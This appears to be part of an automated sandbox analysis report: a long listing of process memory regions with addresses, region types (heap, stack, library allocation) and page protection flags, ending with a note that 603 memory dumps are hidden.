page read and write
|
||
|
3B17000
|
trusted library allocation
|
page read and write
|
||
|
3AF4000
|
trusted library allocation
|
page read and write
|
||
|
1E23F000
|
stack
|
page read and write
|
||
|
3B05000
|
trusted library allocation
|
page read and write
|
||
|
3C86000
|
trusted library allocation
|
page read and write
|
||
|
3628000
|
trusted library allocation
|
page read and write
|
||
|
38E7000
|
trusted library allocation
|
page read and write
|
||
|
7FF848F10000
|
trusted library allocation
|
page execute and read and write
|
||
|
3BDD000
|
trusted library allocation
|
page read and write
|
||
|
3C75000
|
trusted library allocation
|
page read and write
|
||
|
3648000
|
trusted library allocation
|
page read and write
|
||
|
7FF848E7C000
|
trusted library allocation
|
page execute and read and write
|
||
|
7A0000
|
heap
|
page read and write
|
||
|
1C2E4000
|
heap
|
page read and write
|
||
|
1990000
|
heap
|
page read and write
|
||
|
3B77000
|
trusted library allocation
|
page read and write
|
||
|
36CF000
|
trusted library allocation
|
page read and write
|
||
|
24A9A760000
|
heap
|
page read and write
|
||
|
3B1A000
|
trusted library allocation
|
page read and write
|
||
|
7FF848FB0000
|
trusted library allocation
|
page read and write
|
||
|
1C240000
|
heap
|
page read and write
|
||
|
3A95000
|
trusted library allocation
|
page read and write
|
||
|
39A5000
|
trusted library allocation
|
page read and write
|
||
|
1D74C000
|
stack
|
page read and write
|
||
|
39C1000
|
trusted library allocation
|
page read and write
|
||
|
39A1000
|
trusted library allocation
|
page read and write
|
||
|
3BD0000
|
trusted library allocation
|
page read and write
|
||
|
7D0000
|
heap
|
page read and write
|
||
|
7FF848E1D000
|
trusted library allocation
|
page execute and read and write
|
||
|
3BC4000
|
trusted library allocation
|
page read and write
|
||
|
3C37000
|
trusted library allocation
|
page read and write
|
||
|
3C01000
|
trusted library allocation
|
page read and write
|
||
|
7FF848E2D000
|
trusted library allocation
|
page execute and read and write
|
||
|
3B97000
|
trusted library allocation
|
page read and write
|
||
|
3A36000
|
trusted library allocation
|
page read and write
|
||
|
24A9A791000
|
heap
|
page read and write
|
||
|
396B000
|
trusted library allocation
|
page read and write
|
||
|
1490000
|
heap
|
page read and write
|
||
|
1E04A000
|
heap
|
page read and write
|
||
|
3BCC000
|
trusted library allocation
|
page read and write
|
||
|
36A6000
|
trusted library allocation
|
page read and write
|
||
|
24A9A7A2000
|
heap
|
page read and write
|
||
|
36F8000
|
trusted library allocation
|
page read and write
|
||
|
1EC4F000
|
stack
|
page read and write
|
||
|
3B0D000
|
trusted library allocation
|
page read and write
|
||
|
3BF6000
|
trusted library allocation
|
page read and write
|
||
|
3A7E000
|
trusted library allocation
|
page read and write
|
||
|
1D50F000
|
stack
|
page read and write
|
||
|
3AFA000
|
trusted library allocation
|
page read and write
|
||
|
1C379000
|
heap
|
page read and write
|
||
|
E40000
|
trusted library allocation
|
page read and write
|
||
|
3BBD000
|
trusted library allocation
|
page read and write
|
||
|
3A80000
|
trusted library allocation
|
page read and write
|
||
|
3A0F000
|
trusted library allocation
|
page read and write
|
||
|
1CF3D000
|
stack
|
page read and write
|
||
|
FAD000
|
heap
|
page read and write
|
||
|
1CE3E000
|
stack
|
page read and write
|
||
|
1C42E000
|
heap
|
page read and write
|
||
|
1DA3E000
|
stack
|
page read and write
|
||
|
36B2000
|
trusted library allocation
|
page read and write
|
||
|
EF3000
|
heap
|
page read and write
|
||
|
1060000
|
heap
|
page read and write
|
||
|
3BF0000
|
trusted library allocation
|
page read and write
|
||
|
3938000
|
trusted library allocation
|
page read and write
|
||
|
39CA000
|
trusted library allocation
|
page read and write
|
||
|
3A92000
|
trusted library allocation
|
page read and write
|
||
|
3972000
|
trusted library allocation
|
page read and write
|
||
|
780000
|
heap
|
page read and write
|
||
|
362F000
|
trusted library allocation
|
page read and write
|
||
|
3C84000
|
trusted library allocation
|
page read and write
|
||
|
3B39000
|
trusted library allocation
|
page read and write
|
||
|
398F000
|
trusted library allocation
|
page read and write
|
||
|
3912000
|
trusted library allocation
|
page read and write
|
||
|
36C2000
|
trusted library allocation
|
page read and write
|
||
|
394D000
|
trusted library allocation
|
page read and write
|
||
|
3B15000
|
trusted library allocation
|
page read and write
|
||
|
7FF848E34000
|
trusted library allocation
|
page read and write
|
||
|
135A8000
|
trusted library allocation
|
page read and write
|
||
|
1E50E000
|
stack
|
page read and write
|
||
|
1DE3B000
|
stack
|
page read and write
|
||
|
3659000
|
trusted library allocation
|
page read and write
|
||
|
3B24000
|
trusted library allocation
|
page read and write
|
||
|
7FF848DF2000
|
trusted library allocation
|
page read and write
|
||
|
3AB0000
|
trusted library allocation
|
page read and write
|
||
|
3A4E000
|
trusted library allocation
|
page read and write
|
||
|
3B46000
|
trusted library allocation
|
page read and write
|
||
|
15FE000
|
stack
|
page read and write
|
||
|
3C18000
|
trusted library allocation
|
page read and write
|
||
|
7FF848E00000
|
trusted library allocation
|
page read and write
|
||
|
3A58000
|
trusted library allocation
|
page read and write
|
||
|
3C42000
|
trusted library allocation
|
page read and write
|
||
|
3BEC000
|
trusted library allocation
|
page read and write
|
||
|
3B1F000
|
trusted library allocation
|
page read and write
|
||
|
13AE000
|
stack
|
page read and write
|
||
|
3643000
|
trusted library allocation
|
page read and write
|
||
|
36E1000
|
trusted library allocation
|
page read and write
|
||
|
3BD4000
|
trusted library allocation
|
page read and write
|
||
|
7FF848F06000
|
trusted library allocation
|
page execute and read and write
|
||
|
3C82000
|
trusted library allocation
|
page read and write
|
||
|
5D1957F000
|
stack
|
page read and write
|
||
|
3CA0000
|
trusted library allocation
|
page read and write
|
||
|
990000
|
heap
|
page read and write
|
||
|
3974000
|
trusted library allocation
|
page read and write
|
||
|
1EC50000
|
heap
|
page read and write
|
||
|
135B1000
|
trusted library allocation
|
page read and write
|
||
|
3A81000
|
trusted library allocation
|
page read and write
|
||
|
399C000
|
trusted library allocation
|
page read and write
|
||
|
3C46000
|
trusted library allocation
|
page read and write
|
||
|
5D1947C000
|
stack
|
page read and write
|
||
|
3C16000
|
trusted library allocation
|
page read and write
|
||
|
3B68000
|
trusted library allocation
|
page read and write
|
||
|
39D7000
|
trusted library allocation
|
page read and write
|
||
|
3A0A000
|
trusted library allocation
|
page read and write
|
||
|
39E0000
|
trusted library allocation
|
page read and write
|
||
|
E50000
|
heap
|
page read and write
|
||
|
38D6000
|
trusted library allocation
|
page read and write
|
||
|
7FF848E23000
|
trusted library allocation
|
page execute and read and write
|
||
|
1D90E000
|
stack
|
page read and write
|
||
|
9B0000
|
heap
|
page read and write
|
||
|
7FF848ED0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1B680000
|
trusted library allocation
|
page read and write
|
||
|
3985000
|
trusted library allocation
|
page read and write
|
||
|
1FD8F000
|
stack
|
page read and write
|
||
|
7FF848E3B000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF848E4C000
|
trusted library allocation
|
page execute and read and write
|
||
|
3C2F000
|
trusted library allocation
|
page read and write
|
||
|
3C77000
|
trusted library allocation
|
page read and write
|
||
|
3B86000
|
trusted library allocation
|
page read and write
|
||
|
3AC3000
|
trusted library allocation
|
page read and write
|
||
|
1020000
|
trusted library allocation
|
page read and write
|
||
|
3660000
|
trusted library allocation
|
page read and write
|
||
|
16033368000
|
heap
|
page read and write
|
||
|
3667000
|
trusted library allocation
|
page read and write
|
||
|
315D000
|
stack
|
page read and write
|
||
|
7FF848FB0000
|
trusted library allocation
|
page read and write
|
||
|
24A9A6C0000
|
heap
|
page read and write
|
||
|
1C340000
|
heap
|
page read and write
|
||
|
3992000
|
trusted library allocation
|
page read and write
|
||
|
38F6000
|
trusted library allocation
|
page read and write
|
||
|
39F8000
|
trusted library allocation
|
page read and write
|
||
|
7FF848F40000
|
trusted library allocation
|
page execute and read and write
|
||
|
1700000
|
heap
|
page read and write
|
||
|
3BB4000
|
trusted library allocation
|
page read and write
|
||
|
38E3000
|
trusted library allocation
|
page read and write
|
||
|
39AF000
|
trusted library allocation
|
page read and write
|
||
|
39F8000
|
trusted library allocation
|
page read and write
|
||
|
1B810000
|
trusted library allocation
|
page read and write
|
||
|
3B29000
|
trusted library allocation
|
page read and write
|
||
|
3B55000
|
trusted library allocation
|
page read and write
|
||
|
3969000
|
trusted library allocation
|
page read and write
|
||
|
3AFD000
|
trusted library allocation
|
page read and write
|
||
|
39B3000
|
trusted library allocation
|
page read and write
|
||
|
3914000
|
trusted library allocation
|
page read and write
|
||
|
3A12000
|
trusted library allocation
|
page read and write
|
||
|
1100000
|
heap
|
page read and write
|
||
|
8B0000
|
heap
|
page read and write
|
||
|
35A1000
|
trusted library allocation
|
page read and write
|
||
|
1995000
|
heap
|
page read and write
|
||
|
3B28000
|
trusted library allocation
|
page read and write
|
||
|
3A6D000
|
trusted library allocation
|
page read and write
|
||
|
1CB3E000
|
stack
|
page read and write
|
||
|
3A3B000
|
trusted library allocation
|
page read and write
|
||
|
3C5B000
|
trusted library allocation
|
page read and write
|
||
|
3A5E000
|
trusted library allocation
|
page read and write
|
||
|
3AD4000
|
trusted library allocation
|
page read and write
|
||
|
3AEC000
|
trusted library allocation
|
page read and write
|
||
|
36C0000
|
trusted library allocation
|
page read and write
|
||
|
7FF848EC6000
|
trusted library allocation
|
page read and write
|
||
|
36B4000
|
trusted library allocation
|
page read and write
|
||
|
39B6000
|
trusted library allocation
|
page read and write
|
||
|
3AA1000
|
trusted library allocation
|
page read and write
|
||
|
7FF848E24000
|
trusted library allocation
|
page read and write
|
||
|
397D000
|
trusted library allocation
|
page read and write
|
||
|
7FF848DFD000
|
trusted library allocation
|
page execute and read and write
|
||
|
3240000
|
heap
|
page execute and read and write
|
||
|
3675000
|
trusted library allocation
|
page read and write
|
||
|
3BF4000
|
trusted library allocation
|
page read and write
|
||
|
3B44000
|
trusted library allocation
|
page read and write
|
||
|
EDC000
|
heap
|
page read and write
|
||
|
3BA8000
|
trusted library allocation
|
page read and write
|
||
|
1143000
|
heap
|
page read and write
|
||
|
EFA000
|
heap
|
page read and write
|
||
|
3C7B000
|
trusted library allocation
|
page read and write
|
||
|
39F6000
|
trusted library allocation
|
page read and write
|
||
|
3190000
|
heap
|
page execute and read and write
|
||
|
3997000
|
trusted library allocation
|
page read and write
|
||
|
3B22000
|
trusted library allocation
|
page read and write
|
||
|
3960000
|
trusted library allocation
|
page read and write
|
||
|
1C426000
|
heap
|
page read and write
|
||
|
368D000
|
trusted library allocation
|
page read and write
|
||
|
3A4D000
|
trusted library allocation
|
page read and write
|
||
|
3B8C000
|
trusted library allocation
|
page read and write
|
||
|
3BAA000
|
trusted library allocation
|
page read and write
|
||
|
13662000
|
trusted library allocation
|
page read and write
|
||
|
24A9A76A000
|
heap
|
page read and write
|
||
|
3AD6000
|
trusted library allocation
|
page read and write
|
||
|
3B20000
|
trusted library allocation
|
page read and write
|
||
|
1C510000
|
heap
|
page read and write
|
||
|
3BC3000
|
trusted library allocation
|
page read and write
|
||
|
3B4D000
|
trusted library allocation
|
page read and write
|
||
|
3A6F000
|
trusted library allocation
|
page read and write
|
||
|
397A000
|
trusted library allocation
|
page read and write
|
||
|
16033300000
|
heap
|
page read and write
|
||
|
3991000
|
trusted library allocation
|
page read and write
|
||
|
3A03000
|
trusted library allocation
|
page read and write
|
||
|
7FF848E44000
|
trusted library allocation
|
page read and write
|
||
|
33D0000
|
heap
|
page execute and read and write
|
||
|
3A21000
|
trusted library allocation
|
page read and write
|
||
|
F30000
|
heap
|
page read and write
|
||
|
39C6000
|
trusted library allocation
|
page read and write
|
||
|
3706000
|
trusted library allocation
|
page read and write
|
||
|
1C230000
|
heap
|
page execute and read and write
|
||
|
3AFC000
|
trusted library allocation
|
page read and write
|
||
|
3A1A000
|
trusted library allocation
|
page read and write
|
||
|
3983000
|
trusted library allocation
|
page read and write
|
||
|
3BA4000
|
trusted library allocation
|
page read and write
|
||
|
7FF848E39000
|
trusted library allocation
|
page read and write
|
||
|
37DE000
|
stack
|
page read and write
|
||
|
3A2B000
|
trusted library allocation
|
page read and write
|
||
|
3C44000
|
trusted library allocation
|
page read and write
|
||
|
600000
|
unkown
|
page readonly
|
||
|
7FF848E03000
|
trusted library allocation
|
page read and write
|
||
|
3B94000
|
trusted library allocation
|
page read and write
|
||
|
36CA000
|
trusted library allocation
|
page read and write
|
||
|
3B5B000
|
trusted library allocation
|
page read and write
|
||
|
7FF848EAC000
|
trusted library allocation
|
page execute and read and write
|
||
|
24A9A7A1000
|
heap
|
page read and write
|
||
|
3B51000
|
trusted library allocation
|
page read and write
|
||
|
7FF848EC0000
|
trusted library allocation
|
page read and write
|
||
|
146E000
|
stack
|
page read and write
|
||
|
3AE7000
|
trusted library allocation
|
page read and write
|
||
|
7FF848EB0000
|
trusted library allocation
|
page execute and read and write
|
||
|
3623000
|
trusted library allocation
|
page read and write
|
||
|
39D5000
|
trusted library allocation
|
page read and write
|
||
|
F35000
|
heap
|
page read and write
|
||
|
3BEE000
|
trusted library allocation
|
page read and write
|
||
|
1C300000
|
heap
|
page execute and read and write
|
||
|
7FF848E3D000
|
trusted library allocation
|
page execute and read and write
|
||
|
3B8F000
|
trusted library allocation
|
page read and write
|
||
|
3B14000
|
trusted library allocation
|
page read and write
|
||
|
3A4F000
|
trusted library allocation
|
page read and write
|
||
|
3B9E000
|
trusted library allocation
|
page read and write
|
||
|
13651000
|
trusted library allocation
|
page read and write
|
||
|
39C3000
|
trusted library allocation
|
page read and write
|
||
|
1533000
|
heap
|
page execute and read and write
|
||
|
3BC9000
|
trusted library allocation
|
page read and write
|
||
|
2018C000
|
stack
|
page read and write
|
||
|
7FF848E29000
|
trusted library allocation
|
page read and write
|
||
|
7FF848E3D000
|
trusted library allocation
|
page execute and read and write
|
||
|
3AE3000
|
trusted library allocation
|
page read and write
|
||
|
3925000
|
trusted library allocation
|
page read and write
|
||
|
137E8000
|
trusted library allocation
|
page read and write
|
||
|
3B35000
|
trusted library allocation
|
page read and write
|
||
|
1E10C000
|
stack
|
page read and write
|
||
|
16033340000
|
heap
|
page read and write
|
||
|
EDE000
|
heap
|
page read and write
|
||
|
7FF848EF6000
|
trusted library allocation
|
page execute and read and write
|
||
|
1BD1D000
|
stack
|
page read and write
|
||
|
7FF848EE0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF848DF0000
|
trusted library allocation
|
page read and write
|
||
|
3C68000
|
trusted library allocation
|
page read and write
|
||
|
7FF848E10000
|
trusted library allocation
|
page read and write
|
||
|
3A86000
|
trusted library allocation
|
page read and write
|
||
|
3B9F000
|
trusted library allocation
|
page read and write
|
||
|
3CAA000
|
trusted library allocation
|
page read and write
|
||
|
3C97000
|
trusted library allocation
|
page read and write
|
||
|
3BBF000
|
trusted library allocation
|
page read and write
|
||
|
3C79000
|
trusted library allocation
|
page read and write
|
||
|
3BB0000
|
trusted library allocation
|
page read and write
|
||
|
7FF848E23000
|
trusted library allocation
|
page read and write
|
||
|
3A42000
|
trusted library allocation
|
page read and write
|
||
|
1C377000
|
heap
|
page read and write
|
||
|
39A9000
|
trusted library allocation
|
page read and write
|
||
|
7FF848ED6000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF848EA6000
|
trusted library allocation
|
page read and write
|
||
|
1C67F000
|
stack
|
page read and write
|
||
|
135A1000
|
trusted library allocation
|
page read and write
|
||
|
3BCF000
|
trusted library allocation
|
page read and write
|
||
|
112A000
|
heap
|
page read and write
|
||
|
3B0F000
|
trusted library allocation
|
page read and write
|
||
|
1B9D2000
|
heap
|
page read and write
|
||
|
137E3000
|
trusted library allocation
|
page read and write
|
||
|
1C6BE000
|
stack
|
page read and write
|
||
|
E20000
|
trusted library allocation
|
page read and write
|
||
|
11E1000
|
heap
|
page read and write
|
||
|
1C412000
|
heap
|
page read and write
|
||
|
36CC000
|
trusted library allocation
|
page read and write
|
||
|
1C500000
|
heap
|
page execute and read and write
|
||
|
39B6000
|
trusted library allocation
|
page read and write
|
||
|
3AC5000
|
trusted library allocation
|
page read and write
|
||
|
15A0000
|
heap
|
page read and write
|
||
|
7FF848EDC000
|
trusted library allocation
|
page execute and read and write
|
||
|
FF5000
|
stack
|
page read and write
|
||
|
1DD0E000
|
stack
|
page read and write
|
||
|
3A29000
|
trusted library allocation
|
page read and write
|
||
|
FD956FF000
|
unkown
|
page read and write
|
||
|
3B24000
|
trusted library allocation
|
page read and write
|
||
|
3B5B000
|
trusted library allocation
|
page read and write
|
||
|
38D4000
|
trusted library allocation
|
page read and write
|
||
|
137ED000
|
trusted library allocation
|
page read and write
|
||
|
361C000
|
trusted library allocation
|
page read and write
|
||
|
7FF848E14000
|
trusted library allocation
|
page read and write
|
||
|
1B5D0000
|
trusted library allocation
|
page read and write
|
||
|
3CAE000
|
trusted library allocation
|
page read and write
|
||
|
38FA000
|
trusted library allocation
|
page read and write
|
There are 603 hidden memdumps, click here to show them.